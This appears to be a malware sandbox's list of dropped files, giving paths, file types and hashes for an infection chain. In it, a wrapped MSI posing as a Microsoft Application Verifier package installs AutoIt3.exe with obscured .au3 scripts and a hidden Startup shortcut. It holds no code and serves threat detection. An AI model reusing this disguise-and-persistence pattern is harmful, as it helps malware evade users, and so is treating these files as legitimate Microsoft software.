C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\4d7bae1ad8a0f940a33036ae38ff0554.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	C56B5F0201A3B3DE53E561FE76912BFD	2A4062E10A5DE813F5688221DBEB3F3FF33EB417	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\e004f9e1ae4f094daad741c0c79b7d17.tmp	ASCII text, with very long lines (65536), with no line terminators	1B524D03B27B94906C1A87B207E08179	8FBAD6275708A69B764992B05126E053134FB9E9	1AF981D9C5128B3657CDB5506D61563E0D1908B957E5DD6842059D6D3CFDC622
C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe (copy)	PE32 executable (GUI) Intel 80386, for MS Windows	C56B5F0201A3B3DE53E561FE76912BFD	2A4062E10A5DE813F5688221DBEB3F3FF33EB417	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\UGtZgHHT.au3 (copy)	ASCII text, with very long lines (65536), with no line terminators	1B524D03B27B94906C1A87B207E08179	8FBAD6275708A69B764992B05126E053134FB9E9	1AF981D9C5128B3657CDB5506D61563E0D1908B957E5DD6842059D6D3CFDC622
C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\msiwrapper.ini	data	406526B602B613C1EC5672387B911B74	FBF498C6CA5781ECAFD94E44CC9168F07E5E96BC	F7082EACF5238976BB9C51F2B86AC92201B6AB693584B5E90A94859A477D226A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Wed Jul 26 11:01:05 2023, mtime=Wed Jul 26 11:02:00 2023, atime=Wed Jul 26 11:01:05 2023, length=893608, window=hide	12A296AA09D7196EB34454D70B750991	13DD5F81CBBDD558B2BA94FF4F7A342BABF8F136	CBFB56EC3F8A746F70B421486F68DD183291185C708CA06CD8D07090BECA0050
C:\Windows\Installer\5f09c5.msi	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 3.3.14.5, Subject: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft, Keywords: Installer, Template: Intel;1033, Revision Number: {609A83EA-2275-4DEA-858D-BAEFF01E16D0}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2	247A8CC39384E93D258360A11381000F	23893F035F8564DFEA5030B9FDD54120D96072BB	6E068B9DCD8DF03FD6456FAEB4293C036B91A130A18F86A945C8964A576C1C70
C:\Windows\Installer\MSI3403.tmp	data	4F56271E25939DB53E061A846385F042	120015D53F237F56A5DFB77A1F6198CFC684ECC9	47B0A4D7E04A361A15D7DC2D05F82F5FAE2030CC75B3B86F93CFC21FE7F4B13A
C:\Windows\Installer\MSI3433.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D82B3FB861129C5D71F0CD2874F97216	F3FE341D79224126E950D2691D574D147102B18D	107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
C:\Windows\Installer\MSIDAD.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D82B3FB861129C5D71F0CD2874F97216	F3FE341D79224126E950D2691D574D147102B18D	107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
C:\Windows\Installer\SourceHash{229FD164-E132-4ADB-8998-1DB40BF25484}	Composite Document File V2 Document, Cannot read section info	F72F21050D099A517E88C0B9B95BD295	FB927683D4D37559DFE5FF69609B5538620180E2	C5F264EB1A5BF5F5C0BE377CA6AEEE1D891B78A6A14623185C05425B6E2F25F6
C:\Windows\Installer\inprogressinstallinfo.ipi	Composite Document File V2 Document, Cannot read section info	39D002620A197EA3B427C08D601946F3	14AC8566875EFD30752AD110761404EBF50EBEBE	1C703D763A36E66B8DD0014B862B08F0334E2F66DEB2AB5906EB8EAC23421FA4
C:\Windows\Logs\DPX\setupact.log	CSV text	32EE505C5647886928E3D11C54BBA7E4	FE772CBD72DDA16D080E59E10B50FD959E2F1E66	A7AD713CC2A21F50E2B827BA4FCB58FEEE88920AFA94168186271887C685665E
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0C40CFAD0BD2539422CAA8F57D8193EA	DB665B3A82042D8CAD0C44B633C9C1D219AA1B14	BF4A8A2D82A6517F468C4471B0B2394A23EFC2CAEC4C0207924D9B7C3147292B
C:\Windows\Temp\~DF0723A498380A03EB.TMP	Composite Document File V2 Document, Cannot read section info	39D002620A197EA3B427C08D601946F3	14AC8566875EFD30752AD110761404EBF50EBEBE	1C703D763A36E66B8DD0014B862B08F0334E2F66DEB2AB5906EB8EAC23421FA4
C:\Windows\Temp\~DF932E910C2B5A509D.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DFB46B19848F66B19D.TMP	Composite Document File V2 Document, Cannot read section info	B1A8670826B5F77BC753BCADC495A828	98D51716C6EBE6688D045C74A540A048ECBFFC0A	A11AF4BFF8668BD6C80241C2597A694CBD390AB752F6B37BEC7940D03EE6313A
C:\Windows\Temp\~DFB7831024D2CFB248.TMP	data	3903929F7674F66DDD40C1E48FE49788	6F61DA648B2F115CFFC54AB5B7D759621AF3C3B7	D4930E8C3E3CCC91D00F852652EB2EDA8788F1810878386A06F48BA422EFDB66
C:\Windows\Temp\~DFB924194BEFC5CCB1.TMP	data	330881AB07C50808A453FA9D40A83756	E68EE2C966806A4C4E9E705653ED77B43053D68C	61075C0EA7272B6F7C4C4237A4156886F4569170CBC662B8CBA05584745FC90E
C:\Windows\Temp\~DFBA084C2D02A8EEAB.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\temp\AutoIt3.exe	PE32 executable (GUI) Intel 80386, for MS Windows	C56B5F0201A3B3DE53E561FE76912BFD	2A4062E10A5DE813F5688221DBEB3F3FF33EB417	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
C:\temp\efghhgd.au3	ASCII text, with very long lines (65536), with no line terminators	1B524D03B27B94906C1A87B207E08179	8FBAD6275708A69B764992B05126E053134FB9E9	1AF981D9C5128B3657CDB5506D61563E0D1908B957E5DD6842059D6D3CFDC622
\Device\ConDrv	ASCII text, with CRLF, CR, LF line terminators	95817EBB90389A8FD4D35E30A512A8ED	DF6DF33A5BB54BC0640C449E226E7A6D4B2E08D1	B8DFD73944D25D6E6067A5C684571A20E19FB796AFE200A51449AF60D6D0A751